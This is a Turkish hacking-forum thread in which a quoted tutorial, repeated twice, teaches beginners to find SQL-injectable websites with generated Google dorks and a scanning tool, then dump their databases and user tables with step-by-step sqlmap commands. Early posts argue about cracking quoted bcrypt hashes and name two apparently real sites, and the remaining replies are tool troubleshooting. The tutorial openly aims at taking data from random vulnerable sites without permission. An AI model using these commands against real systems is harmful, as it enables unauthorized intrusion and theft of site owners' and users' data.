Birlikte Web Site Hackleyelim!!!

oldminer

oldminer

Hunter / Malware Developer
1 Eyl 2022
239
111
LᎥρɾσɯ' Alıntı:
  1. $2y$10$R6hNxOvkOfEDvXHWu/dI4uEX.EbABHhLhCQH576KNwHdGJ6G4



  2. $2y$10$wYG2WyGFzdBfvjtmL3tyP.lGIywMri.K.jFeuRrAjF5w41dkJC7uq

Bunların rotate sayısı 12 bile değildir. Buyrun kırın lafla olmaz bu işler. Bilginizi görmek isteriz.d
Genişletmek için tıkla ...
demek istedigim bununda kirilmasi muhtemel hocam milyonlarca olasiliginiz arasinda gerek birden fazla kez sifreleme ve rotate kullanin yinede kirilir. bu yaptiginiz sifrenin kirilmasi zordur fakat kirilir. benim kirip kiramamam onemli degildir yani.
 
oldminer

oldminer

Hunter / Malware Developer
1 Eyl 2022
239
111
LᎥρɾσɯ' Alıntı:
Kırılması mümkün müdür? mümkündür. example_hashes [hashcat wiki] bur da örnekleri mevcut. Lakin bur da bunu başarabilen kimseyi göremedim, bir şeyi başarmak ile başarmış gibi yapmak arasında çok fark var. "Kırılamayan hash yoktur" denildiğinde "buyrun" kırın derse biri ve sadece "kırılabilir" demek le yetinmek biraz ilginç olmaz mı? Değinmek istediğim konu buydu. Ayriyeten örnek verdiğim hashlar bana ait değil.
1. https://www.grammarianshc.com
2. Les Trottes de l'Ouest, activités et loisirs à Guérande, loire Atlantique 44
Genişletmek için tıkla ...
hocam ben teorik sekilde ilerleyen bir insanim. ben burda size tecrubemi hash kirarak gostermem asil ilginc olay bu islem icin petabytelarca datayi teker teker denemem lazim buda tecrube degil benim gibi bir insan icin aptallikdir. '"kırılabilir" demek le yetinmek biraz ilginç olmaz mı?' olmaz mi degil dogru. siz olanagi olan birseye olmaz diyorsunuz anlamiyorum hocam hakli degilsiniz daha ne kadar kivirabilirsiniz. isterseniz saatlerce kavga edelim hep ben kazanacagim. Sizin tek yaptiginiz sey benim burda haksiz konumuna getirmeye calisirak kendinizi daha bilgili daha tecrubeli konumuna koymak. bundan sonra en dogrusu haklisiniz diyip cikmak
 
oldminer

oldminer

Hunter / Malware Developer
1 Eyl 2022
239
111
LᎥρɾσɯ' Alıntı:
Üslup önemli bir şey. Yapamadığın şeyleri savunmayı sende dahil bir çok insan meslek edinmiş. "Kıvırabilirsiniz, kazanacağım" bu üslubunuzdan dolayı ergenliği aşamadığınıza kanaat getirdim. Ortada bir kıvırma yok "savunduğun şeyi başaramadın". Ayriyeten eminim ki 1 gün sonra cevap vermenizin ardında yatan gerçeklik "Hash Nasıl Kırılır?, Hashcat kullanımı, Bcrypt yapısı" vb aramalarla geçirdiğinizi düşünüyorum, bu bir tahmin olsa da egonuzun size verdiği hissiyat bunu biraz yansıtmış gibi.
Size gönülden inanıyorum "2,3 güne başarmış olursunuz.d"...
Genişletmek için tıkla ...
Malesef bende bir depremzedeyim köydeyim her zaman internete erisimim olmuyor ama inaninki bu isi dunden beri yapmiyorum ama son bir soz olarak hocam hash kirarak tecrube gosterilmez malesef neyse konuyu dahada uzatmanin bir bagami yok. İyi forumlar hocam
 
Woffluon

Woffluon

Katılımcı Üye
7 Tem 2021
280
95
.net :)' Alıntı:
Öncellikle siz değerli forum üyemizi/yöneticimizi burda görmekten mutluluk duyuyorum

Bugünki konumda dork oluşturup oluşturduğumuz dorkları tarayıp sql açıklı siteler bulup o sitelerden bir tanesini birlikte hackliyelim ne dersiniz ?
6OfL8I.gif




Konunun Temel Amacı Ne ?
Bu konuyu açmamdaki temel amaç web hacking başlıyacak olan arkadaşlara bir nebze bile olsun yol göstermek kafalarında bir fikir oluşturmak
Konunun Sonunda Ne Elde Edeceksiniz ?

Bu konu sonunda temel olarak dork oluşturabilecek, dorkları taratıp sql açıklı site tespit edip bu zaafiyetli sitelerden gerekli verileri ele geçirebileceksiniz
Herhangi bir sorunuz olursa lütfen konu altında belirtiniz
Başlıyalım 😄
6OfL8I.gif

1- Dork (Google Dorks) Oluşturma

Nedir Bu Google Dork ?
Google dork, özel anahtar kelimeler veya operatörler kullanarak Google'da arama yapmak için kullanılan bir terimdir. Google dorkları, arama sonuçlarında belirli türdeki bilgileri, hassas bilgileri veya güvenlik açıklarını ortaya çıkarmak için kullanılabilir. Bazı yaygın kullanılan Google dorkları şunlardır:
  1. site: belirli bir web sitesinde arama yapmak için kullanılır
  2. inurl: URL'lerin belirli bir kelimeyi içermesini sağlar
  3. intitle: belirli bir başlığı olan sayfaları listeler
  4. filetype: belirli bir dosya türünü arar (pdf, doc, xls vb.)
  5. link: belirli bir URL'ye bağlantı veren sayfaları listeler


Otomatik Olarak Zaafiyetli Google Dork Oluşturma


Ben şahsım adına dork oluşturmak için bizzat emek vererek @Mentalistler hocanın biz forum üyeleri için oluşturmuş olduğu Dork Studio toolunu kullanacağım siz başka toolarda kullanabilirsiniz

İlk olarak toolumuzu Githubtan git clone yaparak indirmemiz gerekir bunun için terminalimize
Kod: 
git clone https://github.com/mentalistler/Dork-Studio.git

yazıyoruz sonrasında ise sırasıyla
Kod: 
cd Dork-Studio/

Kod: 
python -m pip install -r requirements.txt

yaptıktan sonra toolu çalıştırmak için

Kod: 
python manage.py runserver

ve tarafımıza böyle bir çıktı verecektir



bpo50gx.png




şimdi ise tarayıcımızın url kısmına http://localhost:8000 yazıyoruz Karşımıza böyle bir arayüz gelecek



6tdfmfu.png



burda ilk olarak oluşturmak istediğimiz dork türünü seçiyoruz daha sonra ise wordlist seçelim ve istediğimiz herhangi bir ülke varsa onuda seçip devam et (Next) diyoruz daha sonraki ekranımız bu şekilde olacaktır



b7w580b.png




Burda üretmek istediğiniz dork sayısını giriniz daha sonrasında eğerki wordlist seçtiyseniz herhangi bir karakter sayısı girmenize gerek yok karşımıza vereceği çıktı bu şekilde olacaktır



OP7Vy6K.png



Burdan txt görünümünü seçip kopyalıyoruz şimdi ise 2.toolumuz olan dork tarama ve sql açıklı site bulmak için biz forum üyeleri için bizzat @Mentalistler

tarafından yapılmış bit tool olan fetisql v2 kullanacağız bunun için ilk olarak sırasıyla


Kod: 
git clone https://github.com/mentalistler/FetiSQL-V2.git
cd FetiSQL-V2
pip install -r requirements.txt
python main.py


Açılan menüde ilk olarak dork taratacağımız için ilk önce FetiSQL-V2 klasorüne gelip files/dorks.txt içine kopyaladığımız (oluşturduğumuz) dorkları yapıştırıyoruz kaydedip çıktıktan sonra terminalden FetiSQL-V2 çalıştırıyoruz

SQL açık kontrolü

Bunun için ekstra bir tool kurmamıza gerek yok zaten bu FetiSQL-V2 de mevcut bunun için menüden 2 diyip devam ediyoruz. Eğerki siz başka bir tooldan tarattıysanız dorklarınızı bulunan result dosyasını result/result.txt içine kaydediniz.işlem sonucunda açık olan siteleri bizler için böyle tek tek kaydedecektir.


cpragHD.png


Veri Çekme Nasıl Yapılır ?

Öncellikle FetiSQL-V2 toolumuzun bize verdiği açıklı siteler result/sql.txt içine kaydediliyor ordaki açıklı site linkini kopyalayıp yeni bir terminalde


Kod: 
sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --dbs



fzwcahj.png


(çıktımız buna benzer olacaktır)

yapıp sitenin içinde barındırdığı database isimlerinini buluyoruz. (unutmadan eklemek istiyorum bu adımlarda y/n gibi sorular soruyor bazen bunlar c/s/q olabiliyor bu durumda sqlmap size önerdiğini büyük harfle gösterecektir Y/n gibi) Sonra ise



Kod: 
sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --current-db





yazıp hedef açıklı sitede aktif olarak kullanılan database ismini alıyoruz çıktımız bu sekilde olacaktır.



4ah0cza.png




şimdi ise database içinde bulunan tabloları görüntüliyelim bunun için



Kod: 
sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --tables -D current db sonucumuzu yazıyoruz



iinesfj.png




çıktımız bu şekilde olacaktır burda tablo isimlerimizden az çok içinde hangi tür veriler bulunduğunu tahmin edebiliyoruz mesela benim örnekte önemli veriler kubrc_users ta olduğunu düşünüyorum şimdi ise bakalım seçtiğimiz tablonun içinde neler mevcutmuş bunun için



Kod: 
sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --columns -T seçtiğimiz tablo ismi -D current db ismi



7.PNG




çıktımız buna benziyecek peki burda neler olduğunu gördük ve önemli bilgiler mevcut nasıl içeriğine bakacaz derseniz bunun için



Kod: 
sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --columns -T seçtiğimiz tablo ismi -D current db ismi --dump



ve en son olarak bize verilerin nereye kaydedildiğini gösterir dosya yolunu kopyalayıp erişebilirsiniz



6OfL8I.gif




Önemli Bilgilendirmeler​


1- Bazen veriler şifrelenmiş olarak gelebilir bunların terimsel isimlerine hash diyoruz bunları kırmak bazen zahmetli olabiliyor ancak kırılmayacak herhangi bir şifre yoktur.
2- @Mentalistler hoccanın tooları oldukça iyi daha detaylı bilgi için
3- FetiSQL-V2 konu linki FetiSQL-V2
4- Dork-Studio konu linki Dork-Studio
5- SQL ile herhangi bir bilginiz yok ise Web Hacking Giriş
6- hashları kırmak için Pass The Hash Saldırısı


6OfL8I.gif


Umarım Faydalı Olabilmişimdir :)
Genişletmek için tıkla ...
Elinize sağlık güzel olmuş ama bağzı resimler görünmüyor
 
mrx.exe

mrx.exe

Yeni üye
15 Ocak 2023
9
4
ben bu fetish in kullanımını anlamadım burda sql injection kontrolu icin 2 yazıyorum ama hata veriyor calıstırma komutu nedir acaba bi bilgi alabilirsem sevinirim.
 
N

.net :)

Katılımcı Üye
6 Ağu 2022
326
373
: Onun olduğu hiçbir yerde
mrx.exe' Alıntı:
ben bu fetish in kullanımını anlamadım burda sql injection kontrolu icin 2 yazıyorum ama hata veriyor calıstırma komutu nedir acaba bi bilgi alabilirsem sevinirim.
Genişletmek için tıkla ...
Tam olarak nasıl bir hata aldığınızı bilmiyorum size tafsiyem fetsisqlv2 nin konusuna gitmeniz orda zaten detaylı olarak anlatmış hocam chromium indirmemiş olabilirsiniz onun içinde hata alıyor olabilirsin
 
JohnWick51

JohnWick51

Uzman üye
20 Mar 2022
1,867
770
28
.net :)' Alıntı:
Öncellikle siz değerli forum üyemizi/yöneticimizi burda görmekten mutluluk duyuyorum

Bugünki konumda dork oluşturup oluşturduğumuz dorkları tarayıp sql açıklı siteler bulup o sitelerden bir tanesini birlikte hackliyelim ne dersiniz ?
6OfL8I.gif




Konunun Temel Amacı Ne ?
Bu konuyu açmamdaki temel amaç web hacking başlıyacak olan arkadaşlara bir nebze bile olsun yol göstermek kafalarında bir fikir oluşturmak
Konunun Sonunda Ne Elde Edeceksiniz ?

Bu konu sonunda temel olarak dork oluşturabilecek, dorkları taratıp sql açıklı site tespit edip bu zaafiyetli sitelerden gerekli verileri ele geçirebileceksiniz
Herhangi bir sorunuz olursa lütfen konu altında belirtiniz
Başlıyalım 😄
6OfL8I.gif

1- Dork (Google Dorks) Oluşturma

Nedir Bu Google Dork ?
Google dork, özel anahtar kelimeler veya operatörler kullanarak Google'da arama yapmak için kullanılan bir terimdir. Google dorkları, arama sonuçlarında belirli türdeki bilgileri, hassas bilgileri veya güvenlik açıklarını ortaya çıkarmak için kullanılabilir. Bazı yaygın kullanılan Google dorkları şunlardır:
  1. site: belirli bir web sitesinde arama yapmak için kullanılır
  2. inurl: URL'lerin belirli bir kelimeyi içermesini sağlar
  3. intitle: belirli bir başlığı olan sayfaları listeler
  4. filetype: belirli bir dosya türünü arar (pdf, doc, xls vb.)
  5. link: belirli bir URL'ye bağlantı veren sayfaları listeler


Otomatik Olarak Zaafiyetli Google Dork Oluşturma


Ben şahsım adına dork oluşturmak için bizzat emek vererek @Mentalistler hocanın biz forum üyeleri için oluşturmuş olduğu Dork Studio toolunu kullanacağım siz başka toolarda kullanabilirsiniz

İlk olarak toolumuzu Githubtan git clone yaparak indirmemiz gerekir bunun için terminalimize
Kod: 
git clone https://github.com/mentalistler/Dork-Studio.git

yazıyoruz sonrasında ise sırasıyla
Kod: 
cd Dork-Studio/

Kod: 
python -m pip install -r requirements.txt

yaptıktan sonra toolu çalıştırmak için

Kod: 
python manage.py runserver

ve tarafımıza böyle bir çıktı verecektir



bpo50gx.png




şimdi ise tarayıcımızın url kısmına http://localhost:8000 yazıyoruz Karşımıza böyle bir arayüz gelecek



6tdfmfu.png



burda ilk olarak oluşturmak istediğimiz dork türünü seçiyoruz daha sonra ise wordlist seçelim ve istediğimiz herhangi bir ülke varsa onuda seçip devam et (Next) diyoruz daha sonraki ekranımız bu şekilde olacaktır



b7w580b.png




Burda üretmek istediğiniz dork sayısını giriniz daha sonrasında eğerki wordlist seçtiyseniz herhangi bir karakter sayısı girmenize gerek yok karşımıza vereceği çıktı bu şekilde olacaktır



OP7Vy6K.png



Burdan txt görünümünü seçip kopyalıyoruz şimdi ise 2.toolumuz olan dork tarama ve sql açıklı site bulmak için biz forum üyeleri için bizzat @Mentalistler

tarafından yapılmış bit tool olan fetisql v2 kullanacağız bunun için ilk olarak sırasıyla


Kod: 
git clone https://github.com/mentalistler/FetiSQL-V2.git
cd FetiSQL-V2
pip install -r requirements.txt
python main.py


Açılan menüde ilk olarak dork taratacağımız için ilk önce FetiSQL-V2 klasorüne gelip files/dorks.txt içine kopyaladığımız (oluşturduğumuz) dorkları yapıştırıyoruz kaydedip çıktıktan sonra terminalden FetiSQL-V2 çalıştırıyoruz

SQL açık kontrolü

Bunun için ekstra bir tool kurmamıza gerek yok zaten bu FetiSQL-V2 de mevcut bunun için menüden 2 diyip devam ediyoruz. Eğerki siz başka bir tooldan tarattıysanız dorklarınızı bulunan result dosyasını result/result.txt içine kaydediniz.işlem sonucunda açık olan siteleri bizler için böyle tek tek kaydedecektir.


cpragHD.png


Veri Çekme Nasıl Yapılır ?

Öncellikle FetiSQL-V2 toolumuzun bize verdiği açıklı siteler result/sql.txt içine kaydediliyor ordaki açıklı site linkini kopyalayıp yeni bir terminalde


Kod: 
sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --dbs



fzwcahj.png


(çıktımız buna benzer olacaktır)

yapıp sitenin içinde barındırdığı database isimlerinini buluyoruz. (unutmadan eklemek istiyorum bu adımlarda y/n gibi sorular soruyor bazen bunlar c/s/q olabiliyor bu durumda sqlmap size önerdiğini büyük harfle gösterecektir Y/n gibi) Sonra ise



Kod: 
sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --current-db





yazıp hedef açıklı sitede aktif olarak kullanılan database ismini alıyoruz çıktımız bu sekilde olacaktır.



4ah0cza.png




şimdi ise database içinde bulunan tabloları görüntüliyelim bunun için



Kod: 
sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --tables -D current db sonucumuzu yazıyoruz



iinesfj.png




çıktımız bu şekilde olacaktır burda tablo isimlerimizden az çok içinde hangi tür veriler bulunduğunu tahmin edebiliyoruz mesela benim örnekte önemli veriler kubrc_users ta olduğunu düşünüyorum şimdi ise bakalım seçtiğimiz tablonun içinde neler mevcutmuş bunun için



Kod: 
sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --columns -T seçtiğimiz tablo ismi -D current db ismi



7.PNG




çıktımız buna benziyecek peki burda neler olduğunu gördük ve önemli bilgiler mevcut nasıl içeriğine bakacaz derseniz bunun için



Kod: 
sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --columns -T seçtiğimiz tablo ismi -D current db ismi --dump



ve en son olarak bize verilerin nereye kaydedildiğini gösterir dosya yolunu kopyalayıp erişebilirsiniz



6OfL8I.gif




Önemli Bilgilendirmeler​


1- Bazen veriler şifrelenmiş olarak gelebilir bunların terimsel isimlerine hash diyoruz bunları kırmak bazen zahmetli olabiliyor ancak kırılmayacak herhangi bir şifre yoktur.
2- @Mentalistler hoccanın tooları oldukça iyi daha detaylı bilgi için
3- FetiSQL-V2 konu linki FetiSQL-V2
4- Dork-Studio konu linki Dork-Studio
5- SQL ile herhangi bir bilginiz yok ise Web Hacking Giriş
6- hashları kırmak için Pass The Hash Saldırısı


6OfL8I.gif


Umarım Faydalı Olabilmişimdir :)
Genişletmek için tıkla ...
Cok TESEKKURLER. Ellerinize saglik
 
BlackHat455

BlackHat455

Katılımcı Üye
16 Eki 2022
316
73
Hocam Sql Dork var mı, varsa birde İlk tool ü kurdum ama calıstıramadım hata veriyor.

python manage.py runserver dedigimde ;

[end of output]

note: This error originates from a subprocess, and is likely not a problem with pip.
error: subprocess-exited-with-error

× pip subprocess to install build dependencies did not run successfully.
│ exit code: 1
╰─> See above for output.

note: This error originates from a subprocess, and is likely not a problem with pip.
~/Dork-Studio
 
N

.net :)

Katılımcı Üye
6 Ağu 2022
326
373
: Onun olduğu hiçbir yerde
BlackHat455' Alıntı:
BlackHat455' Alıntı:
Hocam Sql Dork var mı, varsa birde İlk tool ü kurdum ama calıstıramadım hata veriyor.

python manage.py runserver dedigimde ;

[end of output]

note: This error originates from a subprocess, and is likely not a problem with pip.
error: subprocess-exited-with-error

× pip subprocess to install build dependencies did not run successfully.
│ exit code: 1
╰─> See above for output.

note: This error originates from a subprocess, and is likely not a problem with pip.
~/Dork-Studio
Genişletmek için tıkla ...
Genişletmek için tıkla ...
Pip3 install -r requiments.txt yaptınızmı
Yaptığınıza rağmen hata alıyorsanız bu konu altına mesaj yazmanız daha sağlıklı olacaktır sizin açısınızdan direkr geliştirici ile irtibata geçmiş olursunuz

Mentalistler Dork Studio

Merhabalar, 2014 ve 2015 yıllarında bu forumda Mentalistler DorkMaker ve Mentalistler DorkMaker v2 paylaşmıştım. Fakat aktifliğini yitirdiği için çöp kutusunda, raflarda yerini aldı. Yıllar sonra bu yazılımların devamı niteliğinde Dork Studio'yu sizlerle paylaşıyorum. Genel Kabiliyetler...
www.turkhackteam.org www.turkhackteam.org
 
Thien

Thien

Yeni üye
20 Haz 2021
18
1
BEYLER BEN FETISQL/FILES/DORKS.TXT DOSYASINA DORKLARI KAYD EDIYORUM AMA ONLY READ DIYOR YANI KAYD EDEMIYORUM NE YAPMALIYIM
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.